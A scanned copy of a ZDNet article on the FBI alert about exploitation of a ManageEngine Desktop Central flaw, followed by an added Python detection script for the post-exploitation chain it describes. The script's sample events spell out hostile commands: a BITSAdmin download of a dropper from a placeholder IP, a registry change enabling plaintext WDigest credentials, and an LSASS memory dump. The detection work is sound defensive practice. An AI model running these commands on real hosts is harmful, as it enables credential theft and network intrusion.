Effective URL: https://www.zdnet.com/article/fbi-hackers-are-actively-exploiting-this-flaw-on-manageengine-desktop-central-servers/
Submission: On December 21 via api from US — Scanned from DE
FBI: Hackers are actively exploiting this flaw on ManageEngine Desktop Central servers

Zoho released a patch in December, but attackers are still trying to use the flaw.

Written by Liam Tung, Contributor, on December 21, 2021 | Topic: Security

The FBI's cyber division has issued an alert warning enterprises that use Zoho-owned ManageEngine's Desktop Central that advanced attackers have been exploiting a flaw in the product to install malware since late October.

Zoho released a patch for the authentication bypass flaw CVE-2021-44515 on December 3, warning at the time that it had seen "indications of exploitation" and urging customers to update immediately. Zoho didn't provide further details of the attacks at the time. They follow activity earlier this year targeting previously patched flaws in other ManageEngine products, tracked as CVE-2021-40539 (ADSelfService Plus) and CVE-2021-44077 (ServiceDesk Plus).

The FBI says in the new alert that advanced persistent threat (APT) actors have been exploiting CVE-2021-44515 since at least October 2021. "Since at least late October 2021, APT actors have been actively exploiting a zero-day, now identified as CVE-2021-44515, on ManageEngine Desktop Central servers," the FBI alert said.

Microsoft has previously attributed some of the earlier ManageEngine activity to a Chinese hacker group that installed web shells on compromised servers to gain persistence. The flaws affect IT management products used by end-user organizations and by managed service providers.

The FBI now says it observed APT actors compromising Desktop Central servers through CVE-2021-44515 to drop a webshell that overrides a legitimate function of Desktop Central. The attackers then downloaded post-exploitation tools, enumerated domain users and groups, conducted network reconnaissance, attempted lateral movement across the network, and dumped credentials.

ManageEngine is the enterprise IT management software division of Zoho, a company well known for its software-as-a-service products. The flaw affects both the enterprise edition of Desktop Central and the edition sold to managed service provider (MSP) customers.

The FBI has filled in some details about how attackers are abusing the flaw after obtaining samples that were downloaded from likely compromised ManageEngine ADSelfService Plus servers. It has seen attackers upload two variants of web shells with the filenames emsaler.zip (variant 1, late October 2021), eco-inflect.jar (variant 1, mid-November 2021) and aaa.zip (variant 2, late November 2021). The webshell overrides the legitimate Desktop Central API servlet endpoint, so requests to that endpoint are handled by the attacker's code instead. The webshell is also used for reconnaissance and domain enumeration.

Eventually, the attackers install a remote access tool (RAT) for further intrusion, lateral movement, and credential dumping, using the penetration testing tool Mimikatz and LSASS process memory dumping. The attackers also abused WDigest, a legacy Windows authentication protocol which, when enabled, causes LSASS to keep plaintext credentials in memory, so that a subsequent LSASS dump yields passwords directly. This signals that the attackers were using so-called 'living off the land' techniques, turning legitimate Windows components to nefarious ends. Other tools in this category include Microsoft's BITSAdmin command-line tool, used "to download a likely ShadowPad variant dropper with filename mscoree.dll, and a legitimate Microsoft AppLaunch binary, iop.exe", according to the FBI.

ManageEngine has strongly advised customers to update their installations to the latest build as soon as possible.
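As an added hunting example, not code from the article, the FBI or Zoho: the post-exploitation chain described above (commands spawned by the webshell, a BITSAdmin download, the iop.exe/mscoree.dll pair, WDigest being switched on, and an LSASS dump) written as classification rules over Windows process-creation events. The artifact filenames come from the FBI alert as quoted in the article; the Desktop Central install path, the assumption that its web tier runs as java.exe (so webshell-spawned commands appear as children of that process), the rule names and the sample events are my own constructions.

```python
"""Hunt for the post-exploitation activity the FBI alert describes on a
ManageEngine Desktop Central host, over process-creation events such as
Sysmon Event ID 1.  Sample events are constructed for illustration."""
import re
from dataclasses import dataclass

# Artifact names taken from the FBI alert as quoted in the article.
WEBSHELL_NAMES = ("emsaler.zip", "eco-inflect.jar", "aaa.zip")
DROPPER_DLL = "mscoree.dll"        # "likely ShadowPad variant dropper"
RENAMED_APPLAUNCH = "\\iop.exe"    # legitimate AppLaunch binary, renamed
# Assumption: Desktop Central's web tier runs in java.exe, so commands run
# by a webshell in its API servlet show up as children of that process.
WEB_TIER_PARENT = "\\java.exe"
RECON_TOOLS = ("cmd.exe", "powershell.exe", "net.exe", "net1.exe",
               "whoami.exe", "nltest.exe", "ipconfig.exe")
# Registry key whose UseLogonCredential=1 makes LSASS cache plaintext creds.
WDIGEST_KEY = "securityproviders\\wdigest"


@dataclass(frozen=True)
class ProcEvent:
    image: str      # full path of the new process
    cmdline: str    # its command line
    parent: str     # full path of the parent process


def classify(ev: ProcEvent) -> list[str]:
    """Return the detection labels that fire for one event (empty if benign)."""
    image, cmd, parent = ev.image.lower(), ev.cmdline.lower(), ev.parent.lower()
    hits = []
    if parent.endswith(WEB_TIER_PARENT) and image.rsplit("\\", 1)[-1] in RECON_TOOLS:
        hits.append("shell_from_web_tier")            # webshell running recon
    if image.endswith("\\bitsadmin.exe") and ("/transfer" in cmd or "/addfile" in cmd):
        hits.append("bitsadmin_download")             # living-off-the-land download
    if image.endswith(RENAMED_APPLAUNCH) or DROPPER_DLL in cmd:
        hits.append("shadowpad_sideload_artifact")    # iop.exe / mscoree.dll
    if (image.endswith("\\reg.exe") and WDIGEST_KEY in cmd
            and "uselogoncredential" in cmd and re.search(r"/d\s+0*1\b", cmd)):
        hits.append("wdigest_plaintext_enabled")      # precursor to LSASS dump
    if "lsass" in cmd and ("minidump" in cmd or image.endswith("\\procdump.exe")):
        hits.append("lsass_dump")                     # credential dumping
    if any(name in cmd for name in WEBSHELL_NAMES):
        hits.append("webshell_artifact_name")
    return hits


def hunt(events):
    """Map each event index to its labels, keeping only events that fired."""
    return {i: labels for i, ev in enumerate(events) if (labels := classify(ev))}


DC = "C:\\Program Files\\DesktopCentral_Server"   # assumed install path
SAMPLE_EVENTS = [  # constructed, not real telemetry
    ProcEvent("C:\\Windows\\System32\\svchost.exe", "svchost.exe -k netsvcs",
              "C:\\Windows\\System32\\services.exe"),
    ProcEvent("C:\\Windows\\System32\\cmd.exe",
              'cmd.exe /c net group "Domain Admins" /domain',
              DC + "\\jre\\bin\\java.exe"),
    ProcEvent("C:\\Windows\\System32\\bitsadmin.exe",
              "bitsadmin /transfer j /download /priority high http://203.0.113.5/"
              "mscoree.dll C:\\ProgramData\\mscoree.dll",
              "C:\\Windows\\System32\\cmd.exe"),
    ProcEvent("C:\\ProgramData\\iop.exe", "iop.exe", "C:\\Windows\\System32\\cmd.exe"),
    ProcEvent("C:\\Windows\\System32\\reg.exe",
              "reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\"
              "WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f",
              "C:\\Windows\\System32\\cmd.exe"),
    ProcEvent("C:\\Windows\\System32\\rundll32.exe",
              "rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump 712 "
              "C:\\ProgramData\\lsass.dmp full",
              "C:\\Windows\\System32\\cmd.exe"),
]

if __name__ == "__main__":
    for idx, labels in hunt(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].image, labels)
```

The rules are deliberately narrow: the first one only fires for recon tools whose parent is the Desktop Central JVM, so ordinary administrator activity on the box does not trip it, and the WDigest rule requires the value actually being set to 1 rather than merely queried. On a real host, feed it Sysmon or Security 4688 events with command-line auditing enabled, and treat any hit on a patched-late server as a reason to investigate the webapps directory for the filenames listed above.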